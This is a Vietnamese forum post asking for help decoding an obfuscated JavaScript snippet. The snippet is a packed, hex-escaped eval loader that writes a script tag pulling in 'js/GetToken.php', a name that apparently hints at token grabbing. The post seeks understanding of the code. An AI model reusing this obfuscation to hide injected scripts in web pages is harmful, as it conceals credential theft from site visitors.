Mình có những đoạn code js như ở dưới bạn nào có thể chỉ mình cách decode và encode dạng này với <3 , hoặc có thể decode hộ mình được không
Code:
<script type="text/javascript" >var c=["\x65\x28\x62\x29\x7B\x63\x28\x27\x5C\x36\x5C\x30\x5C\x32\x5C\x33\x5C\x37\x5C\x31\x5C\x34\x20\x5C\x30\x5C\x33\x5C\x32\x5C\x61\x22\x5C\x6C\x5C\x30\x5C\x38\x5C\x64\x5C\x39\x5C\x34\x5C\x66\x5C\x67\x5C\x68\x5C\x39\x5C\x69\x5C\x6A\x5C\x31\x5C\x6B\x5C\x31\x22\x20\x5C\x35\x5C\x36\x5C\x38\x5C\x30\x5C\x32\x5C\x33\x5C\x37\x5C\x31\x5C\x34\x5C\x35\x27\x29\x7D","\x7C","\x73\x70\x6C\x69\x74","\x78\x37\x33\x7C\x78\x37\x30\x7C\x78\x36\x33\x7C\x78\x37\x32\x7C\x78\x37\x34\x7C\x78\x33\x45\x7C\x78\x33\x43\x7C\x78\x36\x39\x7C\x78\x32\x46\x7C\x78\x36\x35\x7C\x78\x33\x44\x7C\x64\x6F\x63\x75\x6D\x65\x6E\x74\x7C\x77\x72\x69\x74\x65\x7C\x78\x34\x37\x7C\x77\x69\x74\x68\x7C\x78\x35\x34\x7C\x78\x36\x46\x7C\x78\x36\x42\x7C\x78\x36\x45\x7C\x78\x32\x45\x7C\x78\x36\x38\x7C\x78\x36\x41","\x72\x65\x70\x6C\x61\x63\x65","","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function(d,e,f,g,h,i){h= function(j){return j.toString(e)};if(!c[5][c[4]](/^/,String)){while(f--){i[h(f)]= g[f]|| h(f)};g= [function(j){return i[j]}];h= function(){return c[6]};f= 1};while(f--){if(g[f]){d= d[c[4]]( new RegExp(c[7]+ h(f)+ c[7],c[8]),g[f])}};return d}(c[0],22,22,c[3][c[2]](c[1]),0,{}))</script>

CẢM ƠN CÁC BẠN <3 , nếu sai mục , mod ,admin chuyển hộ mình với nhaaaa .